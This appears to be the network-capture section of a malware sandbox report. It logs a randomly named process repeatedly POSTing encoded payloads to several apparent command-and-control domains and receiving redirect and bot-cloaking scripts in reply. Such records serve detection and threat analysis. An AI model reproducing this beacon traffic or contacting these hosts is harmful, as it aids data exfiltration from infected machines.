                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.11.30 | 49902 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:56.764674902 CEST | 752 | OUT | POST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=Fn1dtmcByqeJW+XL4eqJoE5Ta1Y08bHBd8t8SyV0QH86hBcQSqDxk8w7bS3KDYimWqwECixI4xNRBAs/B2n6d4Jek/SK9FzUwtoQCXuWuIUv8Ghp+qmd6uq7zdFGObcuIUFM/VvmmjitXaYNLJy3XFwVsZa7G/iSn/vJ8aoMXYqkuMr6kajjO8R3GIrpjjfJ/A==
                                              Sep 24, 2024 11:26:57.293325901 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:26:57 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.11.30 | 49903 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:59.635881901 CEST | 772 | OUT | POST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=Fn1dtmcByqeJEunL+PqJuk5SHFY0nLHFd8p8SzApR1I6hlQQTonxj8w7Vy3DN4i9Wq8MCg1I4xJRBFI/BBz5coJmtfSI+1zUwtoQCXTxuIcv82Rp+PSe5uq4ktFGfrc1IUFU/RvYmgKtXf0Na7KwM1wXh5auW//Mrsz275ZTXtm6vbag5ZXhdctaaJGBhheSiJX4WJjdcVGZHXNYTl7AWqs=
                                              Sep 24, 2024 11:27:00.156910896 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:26:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.11.30 | 49904 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:02.511591911 CEST | 3889 | OUT | POST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY= [TRUNCATED]
                                              Sep 24, 2024 11:27:03.030097008 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:27:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.11.30 | 49905 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:05.394922018 CEST | 489 | OUT | GET /s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:05.922755957 CEST | 496 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:27:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://14680.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.11.30 | 49906 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:11.162286997 CEST | 788 | OUT | POST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=TCwg+l1JR5obVkgpFt88qZniyJoK8i6Ik+1oV/ZTaylaY6vOVuADvtElnuRV1RLgstesj6akYKjVFUf5gxDQk5F4ZDXNqJ3iZhcpQw0D/lKta+dtvsZhJVp124gN/KPCkbBq80mSvMVVfMPLbSRZ2UHTktoCa+BMdMqZfPuRHNsRC17XqpIIk8ehwZ+0NEXyXw==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.11.30 | 49907 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:13.815155983 CEST | 808 | OUT | POST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=TCwg+l1JR5obHXopEM88t5nj5poKpS6Mk+xoV60eaABaZYnOUsoDotElsORQoBLnstTPj7mkYLDVFR75gjrTipF+TTXL1Z3iZhcpQwgl/lStaONt9Z1iE1p2x4gNoaPGkbBY8168vJZVfOXLbjRWtkHVgtoRTtRJceGNT9+kOu83DiKN3q8K3ciMsYTcPGWpK5DlJLr9XzEzG+2gAkdFTJQ=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.11.30 | 49908 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:16.448823929 CEST | 2578 | OUT | POST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY= [TRUNCATED]
                                              Sep 24, 2024 11:27:16.448841095 CEST | 1347 | OUT
                                              Data Ascii: l3c92sFT985kVv6beBV59eR550J3HPmwymhFt8bFK+pMDZyY2Kr2amTnDyGVdWGEyuSbyIfYm6dM8+OTnSLpHSrU7lWOqEgGLR3E7383LUPJJ0cisRbKh20F2U/7x7FtXwiStWX5ocO7IEZ1ov8kHwcHiKBWe3Su5/e+vQb8Pch7uggK3NK3gPdvdb9t+RoyjYbRKxaoYogU8XJrQ3GZXpc9/GMJ2QNQgN8rcQC4825CQqCifkk


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.11.30 | 49909 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:19.085753918 CEST | 501 | OUT | GET /l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s= HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:19.190804005 CEST | 390 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:27:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s="}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.11.30 | 49910 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:32.662895918 CEST | 770 | OUT | POST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=6dvVVX/18e5LL2XPS8IXhNdkn+LW1c7bxB+/c9IhV/k4477le3mGVvBF9l4jxrJfPAg9MrtQJOgpuRqns4IZQwL2F45LT9sW3gQZJxzHU6Sv4q/k5vNVMgNM2RxkcpCRuoqUDgcEU+q+5go4G2lV67i3rCgXvj3y1X6AcpzjdwpZ1ixo+EIgQ5iQ42XT5c4SNw==
                                              Sep 24, 2024 11:27:32.816767931 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 499
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:32 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.11.30 | 49911 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:35.356815100 CEST | 790 | OUT | POST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNA4/bLldySGYPBFlV4i8LITPAk1MpJQJKApuUOnvLQWRgLOOY5NcdsW3gQZJx2oU6Kv7bvk5NlWFANL/xxkWJCVuoq2DhAuU9S+5h44IDFWvriLligZuwm52keyVbm5Th9S5VAyjH8iDZe9k3677e5JQ2nAfsmzIc+sZTfiJKw+2OU=
                                              Sep 24, 2024 11:27:35.514524937 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 498
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:35 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.11.30 | 49912 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:38.042108059 CEST | 2578 | OUT | POST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY= [TRUNCATED]
                                              Sep 24, 2024 11:27:38.042128086 CEST | 1329 | OUT |
                                              Data Ascii: jVc/UKd66HZSRNnOacrBbFzqPZuyeQ0ldy9FixTC+5mvXX5eix+ERjvFJzTgLdFwwthPFKxKzrK10uajbyHGAt40CiYdPsB391qAY+IjYJT0QWqPa2tzPjcTHs9WG+AkTpT0FKSJPMBtpSPZWd0W7XIx59PSd9q+HVbxLfbzKadKDlapwLnOX9b8LSIGN4jHUzJ0/F0lcIeI1Ii7lSNCduCIHwt+pPoIyvWqFgZ97PNNhrPSUxC
                                              Sep 24, 2024 11:27:38.196116924 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 497
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:38 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.11.30 | 49913 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:40.726160049 CEST | 495 | OUT | GET /cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM= HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:40.880598068 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 496
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:40 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.11.30 | 49914 | 134.119.247.136 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:46.219477892 CEST | 773 | OUT | POST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=/hCTf0qw35oq0t4d2D1cxnXkuzidaKHw8tDBd2k7qzNuagMYWkLE7laEHHfPutzmpG6Svjl8DmqEU+DmTihUw5rLv9fMBLTRttmCatMc1krIzhQOK4hzdInQJ74t11cxY0RXp2+GYyqOFuLnVO7Zf+QBt+jQ1I86F3A/eRBSkD45eM7p/oSpudPg419N3vM4/A==
                                              Sep 24, 2024 11:27:46.412291050 CEST | 401 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:27:46 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.11.30 | 49915 | 134.119.247.136 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:27:48.955847979 CEST | 793 | OUT | POST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=/hCTf0qw35oq2OgdwV9c2HWWlTidQqH08t/Bd3QrrB5uaB8YRVLE4laEMnfOgNztpGmwvhx8DmuEU+zmTRYCxprJjdfCPrTRttmCatY61nbI0RMOLdVyDYnTML4tklc1Y0RlpyfTYwSOFv7nV/7aW+QHjeizjLhxET89Ywh1sg5AfbKzirmr99zNk0Ql1tNjiK34xMZM3QMcrBJcJ5eZlAA=
                                              Sep 24, 2024 11:27:49.152493000 CEST | 401 | IN | HTTP/1.1 404 Not Found
